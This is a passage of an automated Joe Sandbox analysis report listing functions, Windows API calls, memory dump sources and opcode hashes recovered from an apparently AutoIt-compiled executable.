                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                          • String ID: `=$h=
                                                                                                          • API String ID: 3902256705-1319648006
                                                                                                          • Opcode ID: a93b5005c5beba21e7685d0d0c27b5f7596520649c81254a58e75c2dfd00b334
                                                                                                          • Instruction ID: eea758217ada80762e080641395cf256b32f94984fbe0834c64664c34df3f89d
                                                                                                          • Opcode Fuzzy Hash: a93b5005c5beba21e7685d0d0c27b5f7596520649c81254a58e75c2dfd00b334
                                                                                                          • Instruction Fuzzy Hash: 06F0283568421DB6CB21BB68FD02ADE77ECDF01394F202556F814B2281DFB09B81C6E1
                                                                                                          Function 00EA3F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00ED2C4C), ref: 00EA3F57
                                                                                                          • GetLastError.KERNEL32 ref: 00EA3F66
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EA3F75
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ED2C4C), ref: 00EA3FD2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2267087916-0
                                                                                                          • Opcode ID: 4a7da75a367f77c9e39f044a350195807ae2ec6439867abe0828fea54b366826
                                                                                                          • Instruction ID: de981644c4aae9977da7e5234e10c0331876236586fce6631dd26e01e474d3df
                                                                                                          • Opcode Fuzzy Hash: 4a7da75a367f77c9e39f044a350195807ae2ec6439867abe0828fea54b366826
                                                                                                          • Instruction Fuzzy Hash: 1C21A774A192019F8700DF38D88199AB7F4EF5A358F105A1EF494E72A1D731AA4ACB42
                                                                                                          Function 00E55B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E55B58
                                                                                                            • Part of subcall function 00E556F8: _memset.LIBCMT ref: 00E55787
                                                                                                            • Part of subcall function 00E556F8: _wcscpy.LIBCMT ref: 00E557DB
                                                                                                            • Part of subcall function 00E556F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E557EB
                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00E55BAD
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E55BBC
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E90D7C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1378193009-0
                                                                                                          • Opcode ID: b75b43f83d13a5bab425e2fcc42f046ba70d0dcfb4f08ee3ed4cd5b59a96166a
                                                                                                          • Instruction ID: 16d374c014abd0a50427f46f3f5b986d3d49099be282e4348211bafa9a65cd14
                                                                                                          • Opcode Fuzzy Hash: b75b43f83d13a5bab425e2fcc42f046ba70d0dcfb4f08ee3ed4cd5b59a96166a
                                                                                                          • Instruction Fuzzy Hash: A3212F715057849FEBB29764DC99FEABBFCAF01308F44148DE69976181C3742988CB41
                                                                                                          Function 00E5278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E549C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E527AF,?,00000001), ref: 00E549F4
                                                                                                          • _free.LIBCMT ref: 00E8FB04
                                                                                                          • _free.LIBCMT ref: 00E8FB4B
                                                                                                            • Part of subcall function 00E529BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E52ADF
                                                                                                          Strings
                                                                                                          • Bad directive syntax error, xrefs: 00E8FB33
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                          • String ID: Bad directive syntax error
                                                                                                          • API String ID: 2861923089-2118420937
                                                                                                          • Opcode ID: 7dd79b1ff9bc94b1ca56c600e4b9fc309a243d8d9a0d4bcc6111758ced3db72e
                                                                                                          • Instruction ID: a47a009ec308c81ba37d12aac3c3169c27ce6fdfd80648875f3ae3f1f073fb1d
                                                                                                          • Opcode Fuzzy Hash: 7dd79b1ff9bc94b1ca56c600e4b9fc309a243d8d9a0d4bcc6111758ced3db72e
                                                                                                          • Instruction Fuzzy Hash: 6D916E71910219AFCF08EFA4C8519EEB7B4FF49314F14656AF81ABB291EB30A945CB50
                                                                                                          Function 00E548B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: AU3! ?$EA06
                                                                                                          • API String ID: 4104443479-1349402219
                                                                                                          • Opcode ID: e35b3a28ddb3a7c96af64901ce65ff5f34efb3b98b01ea9beec18cfd035b65c9
                                                                                                          • Instruction ID: 02715d47eb5689c02c618365b22721b46e426ffcf1b9f77845bc455f84390a5a
                                                                                                          • Opcode Fuzzy Hash: e35b3a28ddb3a7c96af64901ce65ff5f34efb3b98b01ea9beec18cfd035b65c9
                                                                                                          • Instruction Fuzzy Hash: 01418CA1A041585BDF269B5488527FF7BE18B85309F586875EC82FB2C7D5208DC883E1
                                                                                                          Function 00EA9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E54AB2: __fread_nolock.LIBCMT ref: 00E54AD0
                                                                                                          • _wcscmp.LIBCMT ref: 00EA9DE1
                                                                                                          • _wcscmp.LIBCMT ref: 00EA9DF4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                          • String ID: FILE
                                                                                                          • API String ID: 4029003684-3121273764
                                                                                                          • Opcode ID: 9eee5c9a4f1241b8dfab42bc6b298e2003c3d5374345ba4491838439295c644f
                                                                                                          • Instruction ID: 81c6f417edf09a0a4905c23fb940ab5d1e8c1cd48c5bcdeb63b5529d76e46992
                                                                                                          • Opcode Fuzzy Hash: 9eee5c9a4f1241b8dfab42bc6b298e2003c3d5374345ba4491838439295c644f
                                                                                                          • Instruction Fuzzy Hash: B141D872A40209BADF21DAA4CC45FEF7BFDDF4A714F00446AFA00BB182E671A9448765
                                                                                                          Function 00E531BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E9032B
                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00E90375
                                                                                                            • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
                                                                                                            • Part of subcall function 00E609C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E609E4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                          • String ID: X
                                                                                                          • API String ID: 3777226403-3081909835
                                                                                                          • Opcode ID: db8bc42fece6ac68d99eec34ee16e12db14e18c840136872fcc3db1e331b3ade
                                                                                                          • Instruction ID: 864536f09651e9a2342fdc5e334e5fd5ba1665372f9fba8eaff9909594a1a210
                                                                                                          • Opcode Fuzzy Hash: db8bc42fece6ac68d99eec34ee16e12db14e18c840136872fcc3db1e331b3ade
                                                                                                          • Instruction Fuzzy Hash: 4A21A171A002989BCF41DFA4D805BEE7BF8AF49305F00545AE908BB241DBB45A8C9FA1
                                                                                                          Function 00EBD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0031967376a1f3bbf9a1aee60d39145085e81192b43904aaa3ea38d4031e6405
                                                                                                          • Instruction ID: 082fce8693bb3ed8ff969116ff4ec2ce54922ff1ba018319f95d4ef18805bb60
                                                                                                          • Opcode Fuzzy Hash: 0031967376a1f3bbf9a1aee60d39145085e81192b43904aaa3ea38d4031e6405
                                                                                                          • Instruction Fuzzy Hash: ACF12A706083419FC714DF28C984AAABBE5FF88318F14992DF899AB351D771E945CF82
                                                                                                          Function 00E51680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 3b4a543cb78d4f81de040c1616c35665299e4eb9c02acaba2cc3a57ced66ab9c
                                                                                                          • Instruction ID: 8218a932c1f622e267f21de2c4b4086a79aaecf4e030d5851232d96c7cd214f2
                                                                                                          • Opcode Fuzzy Hash: 3b4a543cb78d4f81de040c1616c35665299e4eb9c02acaba2cc3a57ced66ab9c
                                                                                                          • Instruction Fuzzy Hash: 5561E071600209EBDF04CF29D9807AA7BB4FF44351F1895AAEC59EF294EB31D964CB50
                                                                                                          Function 00E4AC2A Relevance: 4.6, APIs: 3, Instructions: 90comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E5FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EC4186,00000001,00ED0980), ref: 00E5FFA7
                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E4AD08
                                                                                                          • OleInitialize.OLE32(00000000), ref: 00E4AD85
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00E82F56
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3815369404-0
                                                                                                          • Opcode ID: 6ca0100fc001dbcec7224c7e0d0f3b57e2bac7f24ff5d601d71bd1a44e676cb1
                                                                                                          • Instruction ID: 8b3fe4acaca427c086bd516ac521e15094435d5986ef24d227856e104ac0d30b
                                                                                                          • Opcode Fuzzy Hash: 6ca0100fc001dbcec7224c7e0d0f3b57e2bac7f24ff5d601d71bd1a44e676cb1
                                                                                                          • Instruction Fuzzy Hash: 944112B4E09388CEC759FF29AD446697BE4FB5831070495EAE418E32B2EA303405FB61
                                                                                                          Function 00E559D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E559F9
                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E55A9E
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E55ABB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_$_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1505330794-0
                                                                                                          • Opcode ID: 832967ebaa33b998d62bc9a5698c8e977398d39fbf6deaa5eff0c2ddbe0709cb
                                                                                                          • Instruction ID: 607634ca511aaaa5c6008874fa833739feef8df571b2751d9db3207536985e08
                                                                                                          • Opcode Fuzzy Hash: 832967ebaa33b998d62bc9a5698c8e977398d39fbf6deaa5eff0c2ddbe0709cb
                                                                                                          • Instruction Fuzzy Hash: 5431D2B19057058FC720EF34D894697BBF8FB48309F000E2EF99AA3241E771A948CB52
                                                                                                          Function 00E6593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00E65953
                                                                                                            • Part of subcall function 00E6A39B: __NMSG_WRITE.LIBCMT ref: 00E6A3C2
                                                                                                            • Part of subcall function 00E6A39B: __NMSG_WRITE.LIBCMT ref: 00E6A3CC
                                                                                                          • __NMSG_WRITE.LIBCMT ref: 00E6595A
                                                                                                            • Part of subcall function 00E6A3F8: GetModuleFileNameW.KERNEL32(00000000,00F053BA,00000104,00000004,00000001,00E61003), ref: 00E6A48A
                                                                                                            • Part of subcall function 00E6A3F8: ___crtMessageBoxW.LIBCMT ref: 00E6A538
                                                                                                            • Part of subcall function 00E632CF: ___crtCorExitProcess.LIBCMT ref: 00E632D5
                                                                                                            • Part of subcall function 00E632CF: ExitProcess.KERNEL32 ref: 00E632DE
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          • RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,?,00000004,?,?,00E61003,?), ref: 00E6597F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1372826849-0
                                                                                                          • Opcode ID: 4751550fc07b152f03636c5c8fedf04cb65e909b2ba7f2cf27726dff45b8c17d
                                                                                                          • Instruction ID: 0f49ae3795fe3041eacb9f265ec4cc008f46f9494ded3f737baab833423c51b1
                                                                                                          • Opcode Fuzzy Hash: 4751550fc07b152f03636c5c8fedf04cb65e909b2ba7f2cf27726dff45b8c17d
                                                                                                          • Instruction Fuzzy Hash: 440192323C1B06DAE6153735BC42A6F33989F927F4F50212BF525BB292DEB08D004B61
                                                                                                          Function 00EA92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00EA92D6
                                                                                                            • Part of subcall function 00E62F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62F99
                                                                                                            • Part of subcall function 00E62F85: GetLastError.KERNEL32(00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62FAB
                                                                                                          • _free.LIBCMT ref: 00EA92E7
                                                                                                          • _free.LIBCMT ref: 00EA92F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                          • Instruction ID: 98b9e9ab3c7175423ba89cb85c2ce35559684618b54517107e37b751c5524380
                                                                                                          • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                          • Instruction Fuzzy Hash: C5E012A1705A1257CA24A5787940F9377FC4FCD7A5715251DB50AFB143CE28F8418178
                                                                                                          Function 00E45E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CALL
                                                                                                          • API String ID: 0-4196123274
                                                                                                          • Opcode ID: b68a89971d7be0129e86a002dfb608cd19aae72d059263361d4260c89bbccc2d
                                                                                                          • Instruction ID: 9364d431c2d12f1d00a993063a8dc1e4e08258ffe7e56ac861b3ba07caebc6f6
                                                                                                          • Opcode Fuzzy Hash: b68a89971d7be0129e86a002dfb608cd19aae72d059263361d4260c89bbccc2d
                                                                                                          • Instruction Fuzzy Hash: 81326A74608341DFCB24DF14D480A6AB7E1BF89304F14A96DF88AAB362D731EC45DB82
                                                                                                          Function 00EBE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strcat.LIBCMT ref: 00EBE20C
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • _wcscpy.LIBCMT ref: 00EBE29B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1012013722-0
                                                                                                          • Opcode ID: d2b78a631f338025286266bc46069ae9d8977239a730ff0432fde005f2b98186
                                                                                                          • Instruction ID: 8cf97ca20d2ff530159df51fe63de1d4cb3fa01ad09da8dc2884bcdc386bd6e0
                                                                                                          • Opcode Fuzzy Hash: d2b78a631f338025286266bc46069ae9d8977239a730ff0432fde005f2b98186
                                                                                                          • Instruction Fuzzy Hash: 7D912735A00604DFCB18DF28D5819EEB7F5EF59314B55A05AE81AAF3A2DB30ED01CB81
                                                                                                          Function 00EA6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00EA614E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
